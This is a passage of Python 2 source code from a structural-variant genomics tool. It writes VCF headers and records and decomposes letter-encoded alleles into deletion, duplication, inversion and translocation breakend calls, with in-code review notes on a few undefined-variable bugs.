print>>fo,'##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">'
print>>fo,'##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END,POLARITY">'
print>>fo,'##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="Difference in length between REF and ALT alleles">'
print>>fo,'##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">'
print>>fo,'##FILTER=<ID=LowQual,Description="Score of final structural - Theoretical Score <-50">'
print>>fo,'##ALT=<ID=DEL,Description="Deletion">'
print>>fo,'##ALT=<ID=DEL:ME:ALU,Description="Deletion of ALU element">'
print>>fo,'##ALT=<ID=DEL:ME:L1,Description="Deletion of L1 element">'
print>>fo,'##ALT=<ID=DUP,Description="Duplication">'
print>>fo,'##ALT=<ID=DUP_TANDEM,Description="Tandem Duplication">'
print>>fo,'##ALT=<ID=INS,Description="Insertion of novel sequence">'
print>>fo,'##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">'
print>>fo,'##ALT=<ID=INS:ME:L1,Description="Insertion of L1 element">'
print>>fo,'##ALT=<ID=INV,Description="Inversion">'
print>>fo,'##ALT=<ID=CNV,Description="Copy number variable region">'
print>>fo,'##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">'
print>>fo,'##FORMAT=<ID=GQ,Number=1,Type=Float,Description="Genotype quality">'
print>>fo,'##FORMAT=<ID=CN,Number=1,Type=Integer,Description="Copy number genotype for imprecise events">'
print>>fo,'##FORMAT=<ID=CNQ,Number=1,Type=Float,Description="Copy number genotype quality for imprecise events">'
print>>fo,'\t'.join(['#CHROM','POS','ID','REF','ALT','QUAL','FILTER','INFO','FORMAT',output_file.split('/')[-1].replace('.vcf','')])
fo.close()
def write_VCF_main(output_file):
    """Append the collected SV rows (global sv_out) to output_file in VCF
    order: chromosome (global chromos order), then start position.

    Complementary het rows of the same variant ('1|0' + '0|1') are merged
    into one '1|1' row, and placeholder 'N' REF alleles are resolved through
    ref_base_returnN just before writing.
    """
    fo=open(output_file,'a')
    print output_file
    sv_reorganize={}
    for k1 in sv_out.keys():
        sv_reorganize[k1]={}
        for k2 in sv_out[k1].keys():
            # event ids look like '<chrom>_<start>_...'
            start=int(k2.split('_')[1])
            if not start in sv_reorganize[k1].keys():
                sv_reorganize[k1][start]={}
            # split rows into unique row-prefixes and their genotype lists
            SVtemp_a=[]
            SVtemp_b=[]
            for k3 in sv_out[k1][k2]:
                if not k3[:-1] in SVtemp_a:
                    SVtemp_a.append(k3[:-1])
                    SVtemp_b.append([k3[-1]])
                else:
                    SVtemp_b[SVtemp_a.index(k3[:-1])].append(k3[-1])
            SVtemp=[]
            sv_reorganize[k1][start][k2]=[]
            # a '1|0' and a '0|1' call of the same variant form one hom call
            for k3 in range(len(SVtemp_a)):
                if len(SVtemp_b[k3])==2 and SVtemp_b[k3] in [['0|1', '1|0'],['1|0', '0|1']]:
                    SVtemp_b[k3]=['1|1']
            for k3 in range(len(SVtemp_a)):
                for k4 in SVtemp_b[k3]:
                    sv_reorganize[k1][start][k2].append(SVtemp_a[k3]+[k4])
    for k1 in chromos:
        if k1 in sv_reorganize.keys():
            for k2 in sorted(sv_reorganize[k1].keys()):
                for k3 in sorted(sv_reorganize[k1][k2].keys()):
                    for k4 in sv_reorganize[k1][k2][k3]:
                        if k4[3]=='N':
                            # resolve the placeholder REF base (currently stubbed)
                            k4[3]=ref_base_returnN(ref,k4[0],k4[1])
                        print >>fo, '\t'.join([str(i) for i in k4])
    fo.close()
def simple_flag_SA(k1,k2):
    """Compare reference letter string k1 with alt string k2 and classify the
    rearrangement.

    Returns [deleted_letters, inverted_letters,
             [[dup_unit, copy_count], ...], tra_flag (0/1)].
    '^' after a letter marks an inverted copy.
    """
    # group letters with their trailing '^' (inversion) marks
    temp=[]
    break_flag=0
    for i in k2:
        if not i=='^':
            temp.append(i)
        else:
            temp[-1]+=i
    # merge tokens that are consecutive on the reference, forward runs
    # ('a','b' -> 'ab') and inverted runs ('b^','a^' -> 'ab^'-style)
    temp2=[temp[0]]
    for i in range(len(temp[1:])):
        if not '^' in temp[i] and not '^' in temp[i+1] and ord(temp[i+1])-ord(temp[i])==1:
            temp2[-1]+=temp[i+1]
        elif '^' in temp[i] and '^' in temp[i+1] and ord(temp[i+1][0])-ord(temp[i][0])==-1:
            temp2[-1]=temp[i+1][0]+temp2[-1]
        else:
            temp2.append(temp[i+1])
    outdel=[]
    outinv=[]
    outdup=[]
    outtra=0
    # every '^' token is an inversion; strip the marks for the later checks
    for i in range(len(temp2)):
        j=temp2[i]
        if '^' in j:
            if not j.replace('^','') in outinv:
                outinv.append(j.replace('^',''))
            temp2[i]=j.replace('^','')
    temp3=''.join(temp2)
    # letters out of ascending order imply a translocation
    for i in range(len(temp3)-1):
        if ord(temp3[i+1])-ord(temp3[i])<0:
            outtra=1
    if not temp3==k1:
        # repeated letters are duplications; reference letters absent from the
        # deduplicated alt are deletions
        temp4=[]
        for i in temp3:
            if temp3.count(i)>1:
                if not i in outdup:
                    outdup.append(i)
            if not i in temp4:
                temp4.append(i)
        if not ''.join(temp4)==k1:
            for i in k1:
                if not i in temp4:
                    outdel.append(i)
    if not outdup==[]:
        # count occurrences of each candidate dup unit (from unit_produce),
        # forward (ia) or reverse-complement orientation (ib); consumed units
        # are removed from k3 so shorter units are not double-counted
        dupuni=unit_produce(outdup)
        outdup2=[]
        k3=k2
        for i in dupuni:
            ia=i
            ib=''.join([j+'^' for j in i[::-1]])
            if len(i)>1:
                if temp2.count(ia)+temp2.count(ib)>1:
                    outdup2.append([i,temp2.count(ia)+temp2.count(ib)])
                    k3=k3.replace(ia,'')
                    k3=k3.replace(ib,'')
            elif len(i)==1:
                if k3.count(ia)+k3.count(ib)>1:
                    outdup2.append([i,k3.count(ia)])
                    k3=k3.replace(ia,'')
                    k3=k3.replace(ib,'')
    else:
        outdup2=[]
    return [outdel,outinv,outdup2,outtra]
def add_csv_info(csv1,flag_sex,k1,k2):
    """Register the components of one classified alt allele.

    csv1 = [del_letters, inv_letters, dup_units, tra_flag] from
    simple_flag_SA; flag_sex selects which allele slot the calls go into.
    Deletions/inversions/duplications are recorded per record of
    sv_info[k1][k2]; a tra_flag of 1 triggers translocation breakend output.
    """
    #flag_sex=1: Maternal
    #flag_sex=2: Paternal
    if flag_sex==1:
        del_let=[csv1[0],[]]
        inv_let=[csv1[1],[]]
        dup_let=[csv1[2],[]]
    else:
        del_let=[[],csv1[0]]
        inv_let=[[],csv1[1]]
        dup_let=[[],csv1[2]]
    for k3 in sv_info[k1][k2]:
        del_info_add(k3,del_let)
        inv_info_add(k3,inv_let)
        dup_info_2_add(k3,dup_let)
    if csv1[3]==1:
        tra_info_add(k1,k2)
def del_info_add(k3,del_let):
    """Register deletion calls from one SV record into the global del1 hash.

    k3: record [bp fields..., score]; del_let: [letters deleted on allele a,
    letters deleted on allele b].  A deletion present on both alleles is
    emitted once as homozygous, otherwise as heta/hetb.
    """
    tempa=bp_to_hash(k3[:-1],del_let[0])
    tempb=bp_to_hash(k3[:-1],del_let[1])
    for k1 in tempa:
        if k1 in tempb:
            # BUGFIX: was 'hom', a tag no downstream consumer recognises
            # (hash_reorder maps 'heta'/'hetb'/'homo' to GT); use 'homo'.
            tempc='homo'
            tempb.remove(k1)
        else:
            tempc='heta'
        if not k1[0] in del1.keys():
            del1[k1[0]]=[]
        del1[k1[0]].append(k1[1:]+[tempc,k3[-1],'_'.join(k3[:-1])])
    for k1 in tempb:
        if not k1[0] in del1.keys():
            del1[k1[0]]=[]
        del1[k1[0]].append(k1[1:]+['hetb',k3[-1],'_'.join(k3[:-1])])
def dup_info_add(k3,dup_let):
    """Older duplication recorder (superseded by dup_info_2_add, which carries
    explicit copy counts); still called from comp_info_reorganize.

    NOTE(review): this body reads `k2a`, which is not defined in this scope
    (it is a local of comp_info_reorganize) -- reaching this line raises
    NameError unless k2a leaks in as a global.  Confirm whether the allele
    string should be passed in explicitly.
    """
    #dup_let=[k2i,k2j]
    for k2x in dup_let:
        for k4 in k2x:
            temp=bp_to_hash(k3[:-1],[i for i in k4])
            for k5 in temp:
                if not k5[0] in dup1.keys():
                    dup1[k5[0]]=[]
                dup1[k5[0]].append(k5[1:]+[k3[-1],'_'.join(k3[:-1]),k2a.count(k4)])
def dup_info_2_add(k3,dup_let):
    """Register duplication calls (with copy number) into the global dup1 hash.

    dup_let = [allele-a units, allele-b units], each unit a pair of
    (duplicated letter string, copy count); only counts > 1 are recorded.
    """
    for allele_idx,unit_list in enumerate(dup_let):
        zygosity=('heta','hetb')[allele_idx]
        for unit in unit_list:
            for region in bp_to_hash(k3[:-1],[ch for ch in unit[0]]):
                chrom=region[0]
                if not chrom in dup1.keys():
                    dup1[chrom]=[]
                if unit[1]>1:
                    dup1[chrom].append(region[1:]+[zygosity,k3[-1],'_'.join(k3[:-1]),unit[1]])
def inv_info_add(k3,inv_let):
    """Register inversion calls into the global inv1 hash.

    inv_let = [inverted units on allele a, inverted units on allele b].
    """
    #inv_let=[k2m,k2n]
    for allele_idx,unit_list in enumerate(inv_let):
        zygosity=('heta','hetb')[allele_idx]
        for unit in unit_list:
            for region in bp_to_hash(k3[:-1],[ch for ch in unit]):
                chrom=region[0]
                if not chrom in inv1.keys():
                    inv1[chrom]=[]
                inv1[chrom].append(region[1:]+[zygosity,k3[-1],'_'.join(k3[:-1])])
def let_reclust(vec_in):
    """Cluster consecutive letter tokens into runs.

    Adjacent plain letters in ascending order are merged ('a','b' -> 'ab');
    adjacent inverted tokens in descending order are merged ('b^','a^'),
    and each inverted run is normalised to '<letters in order>^' with
    duplicates dropped.  Returns [] for empty input.
    """
    if vec_in==[]:
        return []
    runs=[vec_in[0]]
    for prev,cur in zip(vec_in,vec_in[1:]):
        if '^' in cur:
            if '^' in prev and ord(prev[0])-ord(cur[0])==1:
                runs[-1]+=cur
            else:
                runs.append(cur)
        else:
            if '^' not in prev and ord(cur[0])-ord(prev[0])==1:
                runs[-1]+=cur
            else:
                runs.append(cur)
    out=[]
    for run in runs:
        if '^' in run:
            # tokens are '<letter>^' pairs, so the letters sit at even indices
            letters=run[::2]
            normalised=letters[::-1]+'^'
            if normalised not in out:
                out.append(normalised)
        else:
            out.append(run)
    return out
def dup_let_recombind(vec_in):
    """Group sorted letters into consecutive runs, then emit every contiguous
    sub-unit of length >= 2 from each multi-letter run; single-letter runs
    are emitted as-is.  E.g. ['a','b','c'] -> ['ab','bc','abc'].
    """
    if vec_in==[]:
        return []
    letters=sorted(vec_in)
    runs=[[letters[0]]]
    for ch in letters[1:]:
        if ord(ch)-ord(runs[-1][-1])==1:
            runs[-1].append(ch)
        else:
            runs.append([ch])
    units=[]
    for run in runs:
        if len(run)==1:
            units.append(run)
        else:
            for width in range(2,len(run)+1):
                for start in range(len(run)-width+1):
                    units.append(run[start:start+width])
    return [''.join(u) for u in units]
def comp_info_reorganize(k1,k2):
    """Decompose one alt structure k2 ('alleleA/alleleB') of ref structure k1
    into deletion / duplication / inversion components for every record of
    the global sv_info[k1][k2], dispatching to del_info_add / dup_info_add /
    inv_info_add.  (tra_let is collected but never used here.)
    """
    del_let=[[],[]]
    dup_let=[[],[]]
    inv_let=[[],[]]
    tra_let=[[],[]]
    k2a=k2.split('/')[0]
    k2b=k2.split('/')[1]
    # group each allele's letters with their trailing '^' marks
    k2c=[]
    k2d=[]
    for k3 in k2a:
        if not k3=='^':
            k2c.append(k3)
        else:
            k2c[-1]+=k3
    for k3 in k2b:
        if not k3=='^':
            k2d.append(k3)
        else:
            k2d[-1]+=k3
    # reference letters absent from an allele are deletions; letters occurring
    # more than once are duplications
    for k3 in k1.split('/')[0]:
        if k2a.count(k3)==0:
            del_let[0].append(k3)
        if k2b.count(k3)==0:
            del_let[1].append(k3)
        if k2a.count(k3)>1:
            dup_let[0].append(k3)
        if k2b.count(k3)>1:
            dup_let[1].append(k3)
    k2e=let_reclust(k2c)
    k2f=let_reclust(k2d)
    k2g=dup_let_recombind(dup_let[0])
    k2h=dup_let_recombind(dup_let[1])
    k2i=[]
    # integrated dup sections (allele a)
    k2j=[]
    # integrated dup sections (allele b)
    # a combined dup unit counts only if it appears in more than one cluster
    for k3 in k2g:
        flag1=0
        for k4 in k2e:
            if k3 in k4:
                flag1+=1
        if flag1>1:
            k2i.append(k3)
    for k3 in dup_let[0]:
        if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
            if not k3[0] in k2i:
                k2i.append(k3[0])
    for k3 in k2h:
        flag1=0
        for k4 in k2e:
            if k3 in k4:
                flag1+=1
        if flag1>1:
            k2j.append(k3)
    for k3 in dup_let[1]:
        if k2e.count(k3[0])+k2e.count(k3[0]+'^')>0:
            if not k3[0] in k2j:
                k2j.append(k3[0])
    # clusters ending in '^' are inverted segments
    k2m=[]
    for k3 in k2e:
        if k3[-1]=='^':
            k2m.append(k3)
    k2n=[]
    for k3 in k2f:
        if k3[-1]=='^':
            k2n.append(k3)
    for k3 in sv_info[k1][k2]:
        del_info_add(k3,del_let)
        dup_info_add(k3,[k2i,k2j])
        inv_info_add(k3,[k2m,k2n])
def bp_to_hash(bp_list,sv_let):
    """Map SV letters back to genomic intervals.

    bp_list is a flat record like [chr, pos, pos, ..., chr2, pos, ...]; each
    consecutive position pair on a chromosome defines one lettered block
    ('a','b',...).  sv_let selects blocks (only the first character of each
    token is used); consecutive letters on the same chromosome are merged.
    Returns a list of [chrom, int(start), int(end)].
    """
    sv_let=[i[0] for i in sv_let]
    # split bp_list into per-chromosome position runs
    blocks=[]
    for token in bp_list:
        if token in chromos or not token.isdigit():
            blocks.append([token])
        else:
            blocks[-1].append(token)
    # assign a letter to every adjacent position pair
    bp_hash={}
    letter_idx=0
    for blk in blocks:
        for i in range(len(blk)-2):
            bp_hash[chr(97+letter_idx)]=[blk[0],blk[i+1],blk[i+2]]
            letter_idx+=1
    out=[]
    if not sv_let==[]:
        out.append(bp_hash[sv_let[0]])
        for i in range(len(sv_let)-1):
            cur=sv_let[i]
            nxt=sv_let[i+1]
            if ord(nxt)-ord(cur)==1 and bp_hash[nxt][0]==bp_hash[cur][0]:
                out[-1]+=bp_hash[nxt][1:]
            else:
                out.append(bp_hash[nxt])
    return [[seg[0],int(seg[1]),int(seg[-1])] for seg in out]
def tra_info_add(k1,k2):
    """Record translocation output for every record of sv_info[k1][k2] into
    the global tra1 hash as tra1[SV_ID]['a'/'b'] = rows.

    k1 is the ref structure 'letters/letters', k2 the alt structure.  For
    each allele, either plain ['DEL', chrom, start, ref, end] rows (when the
    alt is a simple in-order structure) or VCF breakend-style rows
    [chrom, pos, ref, alt_bnd] are emitted.

    NOTE(review): the simple-deletion branches iterate over `a2`, which is
    not defined in this scope -- that path raises NameError when reached;
    it presumably should read k3[:-1] like the bp_hash build above.  Confirm.
    """
    for k3 in sv_info[k1][k2]:
        SV_ID='_'.join([str(i) for i in k3])
        tra1[SV_ID]={}
        k2a=k2.split('/')[0]
        k2b=k2.split('/')[1]
        # map each letter to [chrom, start, end] from the record's bp fields
        bp_hash={}
        block_rec=0
        block_hash=[]
        for a3 in k3[:-1]:
            if a3 in chromos or not a3.isdigit():
                block_hash.append([a3])
            else:
                block_hash[-1].append(a3)
        for a3 in block_hash:
            for a4 in range(len(a3)-2):
                bp_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                block_rec+=1
        # expand each boundary position into a (pos-1, pos) pair
        for a3 in bp_hash.keys():
            temp=[]
            for a4 in bp_hash[a3][1:]:
                temp.append(int(a4)-1)
                temp.append(int(a4))
            bp_hash[a3][1:]=temp
        #ref_allele['left']=[ref_allele[k1[0]][0]]
        #ref_allele['right']=[ref_allele[k1[-1]][1]]
        bp_hash['left']=[bp_hash[k1[0]][0],bp_hash[k1[0]][1],bp_hash[k1[0]][2]]
        bp_hash['right']=[bp_hash[k1[-1]][0],bp_hash[k1[-1]][3],bp_hash[k1[-1]][4]]
        # reference base at every stored position (stubbed to 'N')
        ref_allele={}
        for a3 in bp_hash.keys():
            ref_allele[a3]=[bp_hash[a3][0]]
            for a4 in bp_hash[a3][1:]:
                ref_allele[a3].append(ref_base_returnN(ref,bp_hash[a3][0],a4))
        # ---- allele a ----
        if not k2a==k1.split('/')[0] and del_flag_SA(k1.split('/')[0],k2a)==0:
            flag1=0#flag1==0:w/o inversion in the alt structure
            if '^' in k2a:
                flag1+=1
            flag2=0#flag2==0:w/o duplication in the alt structure
            for j in k2a:
                if k2a.count(j)>1:
                    flag2+=1
            flag3=0 #flag3==0: w/o translocation
            if len(k2a)>1:
                for i in range(len(k2a)-1):
                    if not ord(k2a[i+1])>ord(k2a[i]):
                        flag3+=1
            if flag1+flag2+flag3==0:
                # simple case: alt is an in-order subset -> plain deletions
                heta_Del_block=[]
                for a1 in k1.split('/')[0]:
                    if not a1 in k2a:
                        heta_Del_block.append(a1)
                tra1[SV_ID]['a']=[]
                block_hash=[]
                del_hash={}
                block_rec=0
                for a3 in a2[0]:
                    if a3 in chromos:
                        block_hash.append([a3])
                    else:
                        block_hash[-1].append(a3)
                for a3 in block_hash:
                    for a4 in range(len(a3)-2):
                        del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                        block_rec+=1
                if not heta_Del_block==[]:
                    # merge consecutive same-chromosome deleted letters
                    a_heta=0
                    heta_Del_new=[heta_Del_block[0]]
                    while True:
                        a_heta+=1
                        if a_heta==len(heta_Del_block):break
                        if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
                            heta_Del_new[-1]+=heta_Del_block[a_heta]
                        else:
                            heta_Del_new.append(heta_Del_block[a_heta])
                    for a3 in heta_Del_new:
                        a4=a3[0]
                        tra1[SV_ID]['a'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
                        a4=a3[-1]
                        tra1[SV_ID]['a'][-1].append(int(del_hash[a4][2])-1)
            else:
                # complex case: emit breakend rows for every junction
                tra1[SV_ID]['a']=[]
                # group letters with their '^' marks
                t1=[]
                for a3 in k2a:
                    if not a3=='^':
                        t1.append(a3)
                    else:
                        t1[-1]+=a3
                # merge tokens contiguous on the same chromosome (either strand)
                t2=[t1[0]]
                for a3 in t1[1:]:
                    if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
                        t2[-1]+=a3
                    elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
                        t2[-1]+=a3
                    else:
                        t2.append(a3)
                # junction between the left flank and the first segment
                a3='left'
                a4=t2[0]
                l_chr=bp_hash[a3][0]
                r_chr=bp_hash[a4[0]][0]
                if not '^' in a4:
                    if not a4[0]==k1[0]:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
                elif '^' in a4:
                    tra1[SV_ID]['a'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
                    tra1[SV_ID]['a'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                # junctions between adjacent segments; orientation of each side
                # decides the bracket form of the breakend ALT
                for t3 in range(len(t2)-1):
                    a3=t2[t3]
                    a4=t2[t3+1]
                    l_chr=bp_hash[a3[0]][0]
                    r_chr=bp_hash[a4[0]][0]
                    if not '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
                    elif '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
                    elif not '^' in a3 and '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                    elif '^' in a3 and '^' in a4:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
                # junction between the last segment and the right flank
                # (t3 is undefined when len(t2)==1, hence the guard)
                if len(t2)>1:
                    a3=t2[t3+1]
                else:
                    a3=t2[0]
                a4='right'
                l_chr=bp_hash[a3[0]][0]
                r_chr=bp_hash[a4][0]
                if not '^' in a3:
                    if not a3[-1]==k1[-1]:
                        tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
                        tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
                if '^' in a3:
                    tra1[SV_ID]['a'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
                    tra1[SV_ID]['a'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
        #print [k1,k2]
        # ---- allele b: mirror of the allele-a section above ----
        if not k2b==k1.split('/')[1] and del_flag_SA(k1.split('/')[1],k2b)==0:
            flag1=0#flag1==0:w/o inversion in the alt structure
            if '^' in k2b:
                flag1+=1
            flag2=0#flag2==0:w/o duplication in the alt structure
            for j in k2b:
                if k2b.count(j)>1:
                    flag2+=1
            flag3=0 #flag3==0: w/o translocation
            if len(k2b)>1:
                for i in range(len(k2b)-1):
                    if not ord(k2b[i+1])>ord(k2b[i]):
                        flag3+=1
            if flag1+flag2+flag3==0:
                heta_Del_block=[]
                for a1 in k1.split('/')[1]:
                    if not a1 in k2b:
                        heta_Del_block.append(a1)
                tra1[SV_ID]['b']=[]
                block_hash=[]
                del_hash={}
                block_rec=0
                for a3 in a2[0]:
                    if a3 in chromos:
                        block_hash.append([a3])
                    else:
                        block_hash[-1].append(a3)
                for a3 in block_hash:
                    for a4 in range(len(a3)-2):
                        del_hash[chr(97+block_rec)]=[a3[0],a3[a4+1],a3[a4+2]]
                        block_rec+=1
                if not heta_Del_block==[]:
                    a_heta=0
                    heta_Del_new=[heta_Del_block[0]]
                    while True:
                        a_heta+=1
                        if a_heta==len(heta_Del_block):break
                        if ord(heta_Del_block[a_heta])-ord(heta_Del_block[a_heta-1])==1 and del_hash[heta_Del_block[a_heta]][0]==del_hash[heta_Del_block[a_heta-1]][0]:
                            heta_Del_new[-1]+=heta_Del_block[a_heta]
                        else:
                            heta_Del_new.append(heta_Del_block[a_heta])
                    for a3 in heta_Del_new:
                        a4=a3[0]
                        tra1[SV_ID]['b'].append(['DEL',del_hash[a4][0],int(del_hash[a4][1]),ref_allele[a4][2]])
                        a4=a3[-1]
                        tra1[SV_ID]['b'][-1].append(int(del_hash[a4][2])-1)
            else:
                tra1[SV_ID]['b']=[]
                t1=[]
                for a3 in k2b:
                    if not a3=='^':
                        t1.append(a3)
                    else:
                        t1[-1]+=a3
                t2=[t1[0]]
                for a3 in t1[1:]:
                    if not '^' in a3 and not '^' in t2[-1] and ord(a3)-ord(t2[-1][-1])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-1]][0]:
                        t2[-1]+=a3
                    elif '^' in a3 and '^' in t2[-1] and ord(t2[-1][-2])-ord(a3[0])==1 and bp_hash[a3[0]][0]==bp_hash[t2[-1][-2]][0]:
                        t2[-1]+=a3
                    else:
                        t2.append(a3)
                a3='left'
                a4=t2[0]
                l_chr=bp_hash[a3][0]
                r_chr=bp_hash[a4[0]][0]
                if not '^' in a4:
                    if not a4[0]==k1[0]:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3][1])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+'['+r_chr+':'+str(bp_hash[a4[0]][2])+'['])
                elif '^' in a4:
                    tra1[SV_ID]['b'].append([r_chr, bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3][1])+']'])
                    tra1[SV_ID]['b'].append([l_chr,bp_hash[a3][1],ref_allele[a3][1],ref_allele[a3][1]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                for t3 in range(len(t2)-1):
                    a3=t2[t3]
                    a4=t2[t3+1]
                    l_chr=bp_hash[a3[0]][0]
                    r_chr=bp_hash[a4[0]][0]
                    if not '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['])
                    elif '^' in a3 and not '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][2],ref_allele[a4[0]][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4[0]][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4[0]][0]+':'+str(bp_hash[a4[0]][2])+'['+ref_allele[a3[-2]][2]])
                    elif not '^' in a3 and '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'])
                    elif '^' in a3 and '^' in a4:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4[0]][3],ref_allele[a4[0]][3],ref_allele[a4[0]][3]+'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2], ']'+r_chr+':'+str(bp_hash[a4[0]][3])+']'+ref_allele[a3[-2]][2]])
                if len(t2)>1:
                    a3=t2[t3+1]
                else:
                    a3=t2[0]
                a4='right'
                l_chr=bp_hash[a3[0]][0]
                r_chr=bp_hash[a4][0]
                if not '^' in a3:
                    if not a3[-1]==k1[-1]:
                        tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],']'+l_chr+':'+str(bp_hash[a3[-1]][3])+']'+ref_allele[a4][2]])
                        tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-1]][3],ref_allele[a3[-1]][3],ref_allele[a3[-1]][3]+'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['])
                if '^' in a3:
                    tra1[SV_ID]['b'].append([r_chr,bp_hash[a4][2],ref_allele[a4][2],'['+l_chr+':'+str(bp_hash[a3[-2]][2])+'['+ref_allele[a4][2]])
                    tra1[SV_ID]['b'].append([l_chr,bp_hash[a3[-2]][2],ref_allele[a3[-2]][2],'['+bp_hash[a4][0]+':'+str(bp_hash[a4][2])+'['+ref_allele[a3[-2]][2]])
def sv_homo_initial():
    """Reset the global sv_homo_info hash: one empty list per SV type."""
    for sv_type in ('DEL','DUP','INV','TRA','DUP_TANDEM'):
        sv_homo_info[sv_type]=[]
def produce_keys(key):
    """Return [ref_structure, alt_structure] letter strings for a simple SV
    type; structures are 'maternal/paternal' pairs (e.g. DEL: 'a/a' -> '/').
    DUP_TANDEM draws a random copy number in [2,20).
    """
    if key=='DEL':
        ka,kb='a/a','/'
    elif key=='DUP_TANDEM':
        copies=random.sample(range(2,20),1)[0]
        tandem='a'*copies
        ka,kb='a/a',tandem+'/'+tandem
